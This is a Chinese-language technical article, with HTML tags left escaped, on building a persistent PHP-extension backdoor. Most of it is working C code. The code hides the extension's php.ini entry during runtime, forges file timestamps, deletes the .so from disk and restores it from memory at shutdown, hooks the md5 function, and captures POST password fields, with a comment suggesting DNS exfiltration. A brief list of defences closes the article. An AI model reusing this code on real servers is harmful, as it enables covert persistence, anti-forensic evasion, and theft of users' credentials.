PHP扩展持久后门技术详解<\/h1>

概述<\/h2>
PHP扩展后门是一种高级持久化技术，通过修改PHP扩展模块实现隐蔽的后门功能。这种技术具有以下特点：<\/p>
隐蔽性强，难以被传统安全设备检测<\/li>
可以绕过常规防火墙规则<\/li>
能够与合法HTTP请求混合，降低被发现风险<\/li>
可实现对PHP核心函数的Hook，获取敏感信息<\/li> <\/ul>
技术原理<\/h2>

PHP扩展加载机制<\/h3>
PHP解释器启动时会加载php.ini配置文件<\/li>
通过extension = path\/to\/our.so<\/code>指令加载自定义扩展<\/li>
PHP扩展主要关注4个关键Hook：

MINIT<\/code>：模块初始化时执行（通常以root权限）<\/li>
MSHUTDOWN<\/code>：模块关闭时执行（通常以root权限）<\/li>
RINIT<\/code>：请求初始化时执行（以Web服务器用户权限）<\/li>
RSHUTDOWN<\/code>：请求结束时执行（以Web服务器用户权限）<\/li>
<\/ul>
<\/li>
<\/ol>
持久化机制<\/h3>


php.ini的隐蔽修改<\/strong>：<\/p>

在MINIT<\/code>阶段删除扩展加载行<\/li>
在MSHUTDOWN<\/code>阶段恢复扩展加载行<\/li>
修改文件时间戳保持隐蔽<\/li>
<\/ul>
<\/li>

扩展文件的隐蔽<\/strong>：<\/p>

加载时将扩展文件映射到内存<\/li>
删除磁盘上的扩展文件<\/li>
在MSHUTDOWN<\/code>阶段将内存中的扩展写回磁盘<\/li>
<\/ul>
<\/li>
<\/ol>
实现细节<\/h2>
php.ini隐蔽修改<\/h3>
int<\/span> modifyExtension<\/span>(int<\/span> action) {
<\/span><\/span>    char<\/span> *<\/span>source =<\/span> NULL;
<\/span><\/span>    char<\/span> *<\/span>needle =<\/span> NULL;
<\/span><\/span>    FILE *<\/span>fp;
<\/span><\/span>    size_t newSize;
<\/span><\/span>    
<\/span><\/span>    fp =<\/span> fopen(PHPINI, "a+"<\/span>);
<\/span><\/span>    if<\/span> (fp !=<\/span> NULL) {
<\/span><\/span>        if<\/span> (action ==<\/span> 1<\/span>) {
<\/span><\/span>            if<\/span> (fseek(fp, 0L<\/span>, SEEK_END) ==<\/span> 0<\/span>) {
<\/span><\/span>                long<\/span> bufsize =<\/span> ftell(fp); \/\/ 获取文件大小
<\/span><\/span><\/span><\/span>                if<\/span> (bufsize ==<\/span> -<\/span>1<\/span>) return<\/span> -<\/span>1<\/span>;
<\/span><\/span>                
<\/span><\/span>                source =<\/span> malloc(sizeof<\/span>(char<\/span>) *<\/span> (bufsize +<\/span> 1<\/span>));
<\/span><\/span>                if<\/span> (fseek(fp, 0L<\/span>, SEEK_SET) !=<\/span> 0<\/span>) return<\/span> -<\/span>1<\/span>;
<\/span><\/span>                
<\/span><\/span>                newSize =<\/span> fread(source, sizeof<\/span>(char<\/span>), bufsize, fp);
<\/span><\/span>                if<\/span> (ferror(fp) !=<\/span> 0<\/span>) return<\/span> -<\/span>1<\/span>;
<\/span><\/span>                
<\/span><\/span>                source[newSize++<\/span>] =<\/span> '\0'<\/span>;
<\/span><\/span>                needle =<\/span> strstr(source, LOCATION);
<\/span><\/span>                
<\/span><\/span>                if<\/span> (needle !=<\/span> 0<\/span>) {
<\/span><\/span>                    FILE *<\/span>tmp =<\/span> fopen("\/tmp\/.tmpini"<\/span>, "w"<\/span>);
<\/span><\/span>                    fwrite(source, (needle -<\/span> source -<\/span> 11<\/span>), 1<\/span>, tmp); \/\/ 11 = len("\nextension=kk.so")
<\/span><\/span><\/span><\/span>                    fclose(tmp);
<\/span><\/span>                    rename("\/tmp\/.tmpini"<\/span>, PHPINI);
<\/span><\/span>                }
<\/span><\/span>                free(source);
<\/span><\/span>            }
<\/span><\/span>            fclose(fp);
<\/span><\/span>        }
<\/span><\/span>        if<\/span> (action ==<\/span> 0<\/span>) {
<\/span><\/span>            fwrite("<\/span>\n<\/span>extension="<\/span>, 11<\/span>, 1<\/span>, fp);
<\/span><\/span>            fwrite(LOCATION, strlen(LOCATION), 1<\/span>, fp);
<\/span><\/span>            fclose(fp);
<\/span><\/span>            fprintf(stderr, "[+] Extension added to PHP.INI<\/span>\n<\/span>"<\/span>);
<\/span><\/span>        } else<\/span> {
<\/span><\/span>            return<\/span> -<\/span>1<\/span>;
<\/span><\/span>        }
<\/span><\/span>        return<\/span> 1<\/span>;
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>文件时间戳伪造<\/h3>
struct<\/span> stat st;
<\/span><\/span>stat(PHPINI, &<\/span>st);
<\/span><\/span>
<\/span><\/span>\/\/ 修改文件后恢复时间戳
<\/span><\/span><\/span><\/span>struct<\/span> utimbuf new_time;
<\/span><\/span>new_time.actime =<\/span> st.st_atime;
<\/span><\/span>new_time.modtime =<\/span> st.st_mtime;
<\/span><\/span>utime(PHPINI, &<\/span>new_time);
<\/span><\/span><\/code><\/pre>扩展文件内存映射与隐蔽<\/h3>
\/\/ MINIT阶段
<\/span><\/span><\/span><\/span>PHP_MINIT_FUNCTION(PoC) {
<\/span><\/span>    int<\/span> fd, check;
<\/span><\/span>    struct<\/span> utimbuf new_time;
<\/span><\/span>    
<\/span><\/span>    \/\/ 1) 获取文件大小
<\/span><\/span><\/span><\/span>    struct<\/span> stat st;
<\/span><\/span>    if<\/span> (stat(LOCATION, &<\/span>st) ==<\/span> -<\/span>1<\/span>) return<\/span> SUCCESS;
<\/span><\/span>    filesize =<\/span> st.st_size;
<\/span><\/span>    
<\/span><\/span>    \/\/ 2) 打开文件
<\/span><\/span><\/span><\/span>    fd =<\/span> open(LOCATION, O_RDONLY, 0<\/span>);
<\/span><\/span>    if<\/span> (fd ==<\/span> -<\/span>1<\/span>) return<\/span> SUCCESS;
<\/span><\/span>    
<\/span><\/span>    \/\/ 3) 将文件映射到内存
<\/span><\/span><\/span><\/span>    mapedFile =<\/span> mmap(NULL, filesize, PROT_READ, MAP_PRIVATE, fd, 0<\/span>);
<\/span><\/span>    close(fd);
<\/span><\/span>    
<\/span><\/span>    \/\/ 4) 删除文件
<\/span><\/span><\/span><\/span>    remove(LOCATION);
<\/span><\/span>    
<\/span><\/span>    \/\/ 5) 获取php.ini时间戳
<\/span><\/span><\/span><\/span>    stat(PHPINI, &<\/span>st);
<\/span><\/span>    
<\/span><\/span>    \/\/ 6) 修改php.ini并删除扩展行
<\/span><\/span><\/span><\/span>    check =<\/span> modifyExtension(1<\/span>);
<\/span><\/span>    
<\/span><\/span>    \/\/ 7) 伪造时间戳
<\/span><\/span><\/span><\/span>    new_time.actime =<\/span> st.st_atime;
<\/span><\/span>    new_time.modtime =<\/span> st.st_mtime;
<\/span><\/span>    utime(PHPINI, &<\/span>new_time);
<\/span><\/span>    
<\/span><\/span>    return<\/span> SUCCESS;
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>\/\/ MSHUTDOWN阶段
<\/span><\/span><\/span><\/span>PHP_MSHUTDOWN_FUNCTION(Allocer) {
<\/span><\/span>    if<\/span> (mapedFile ==<\/span> MAP_FAILED) return<\/span> SUCCESS;
<\/span><\/span>    
<\/span><\/span>    int<\/span> check;
<\/span><\/span>    FILE *<\/span>fp;
<\/span><\/span>    struct<\/span> utimbuf new_time;
<\/span><\/span>    struct<\/span> stat st;
<\/span><\/span>    
<\/span><\/span>    \/\/ 将内存中的扩展写回文件
<\/span><\/span><\/span><\/span>    fp =<\/span> fopen(LOCATION, "w"<\/span>);
<\/span><\/span>    fwrite(mapedFile, 1<\/span>, filesize, fp);
<\/span><\/span>    fclose(fp);
<\/span><\/span>    munmap(mapedFile, filesize);
<\/span><\/span>    
<\/span><\/span>    \/\/ 恢复php.ini设置
<\/span><\/span><\/span><\/span>    stat(PHPINI, &<\/span>st);
<\/span><\/span>    new_time.actime =<\/span> st.st_atime;
<\/span><\/span>    new_time.modtime =<\/span> st.st_mtime;
<\/span><\/span>    check =<\/span> modifyExtension(0<\/span>);
<\/span><\/span>    utime(PHPINI, &<\/span>new_time);
<\/span><\/span>    
<\/span><\/span>    return<\/span> SUCCESS;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>Hook PHP函数<\/h2>
Hook md5函数示例<\/h3>
\/\/ 原始md5函数hook
<\/span><\/span><\/span><\/span>void<\/span> zif_md5_hook<\/span>(INTERNAL_FUNCTION_PARAMETERS) {
<\/span><\/span>    php_printf("[+] Hook called<\/span>\n<\/span>"<\/span>);
<\/span><\/span>    zend_string *<\/span>arg;
<\/span><\/span>    zend_bool raw_output =<\/span> 0<\/span>;
<\/span><\/span>    
<\/span><\/span>    ZEND_PARSE_PARAMETERS_START(1<\/span>, 2<\/span>)
<\/span><\/span>        Z_PARAM_STR(arg)
<\/span><\/span>        Z_PARAM_OPTIONAL
<\/span><\/span>        Z_PARAM_BOOL(raw_output)
<\/span><\/span>    ZEND_PARSE_PARAMETERS_END();
<\/span><\/span>    
<\/span><\/span>    php_printf("[+] MD5 Called with parameter: %s"<\/span>, ZSTR_VAL(arg));
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>\/\/ 在MINIT中设置hook
<\/span><\/span><\/span><\/span>PHP_MINIT_FUNCTION(PoC) {
<\/span><\/span>    zend_function *<\/span>orig;
<\/span><\/span>    orig =<\/span> zend_hash_str_find_ptr(CG(function_table), "md5"<\/span>, strlen("md5"<\/span>));
<\/span><\/span>    orig-><\/span>internal_function.handler =<\/span> zif_md5_hook;
<\/span><\/span>    
<\/span><\/span>    \/\/ 其他初始化代码...
<\/span><\/span><\/span><\/span>    return<\/span> SUCCESS;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>捕获HTTP请求参数<\/h2>
获取POST参数示例<\/h3>
\/\/ 在RINIT中捕获POST参数
<\/span><\/span><\/span><\/span>PHP_RINIT_FUNCTION(PoC) {
<\/span><\/span>    zval *<\/span>password;
<\/span><\/span>    zval *<\/span>post_arr;
<\/span><\/span>    HashTable *<\/span>post_hash;
<\/span><\/span>    
<\/span><\/span>    post_arr =<\/span> &<\/span>PG(http_globals)[TRACK_VARS_POST]; \/\/ 获取POST数组
<\/span><\/span><\/span><\/span>    post_hash =<\/span> HASH_OF(post_arr); \/\/ 获取HashTable
<\/span><\/span><\/span><\/span>    
<\/span><\/span>    \/\/ 查找特定参数
<\/span><\/span><\/span><\/span>    password =<\/span> zend_hash_str_find(post_hash, "pass"<\/span>, strlen("pass"<\/span>));
<\/span><\/span>    if<\/span> (password !=<\/span> 0<\/span>) {
<\/span><\/span>        php_printf("Password: %s"<\/span>, Z_STRVAL_P(password));
<\/span><\/span>        \/\/ 可以将密码保存到文件或通过DNS外传
<\/span><\/span><\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    return<\/span> SUCCESS;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>防御措施<\/h2>


文件完整性监控<\/strong>：<\/p>

监控php.ini和扩展目录的文件变化<\/li>
使用文件完整性检查工具（如AIDE）<\/li>
<\/ul>
<\/li>

行为监控<\/strong>：<\/p>

监控异常的PHP模块加载行为<\/li>
检查未知的PHP扩展<\/li>
<\/ul>
<\/li>

权限控制<\/strong>：<\/p>

限制对php.ini和扩展目录的写权限<\/li>
使用SELinux等强制访问控制机制<\/li>
<\/ul>
<\/li>

日志分析<\/strong>：<\/p>

分析PHP错误日志中的异常模块加载信息<\/li>
监控异常的HTTP请求模式<\/li>
<\/ul>
<\/li>

代码审计<\/strong>：<\/p>

定期审计服务器上的PHP扩展<\/li>
使用静态分析工具检测恶意扩展<\/li>
<\/ul>
<\/li>
<\/ol>
总结<\/h2>
PHP扩展后门是一种高级的服务器持久化技术，具有极高的隐蔽性。安全团队应加强对PHP环境的监控，特别是对核心配置文件和扩展模块的变更监控，同时实施严格的文件完整性检查和权限控制，以防范此类高级威胁。<\/p>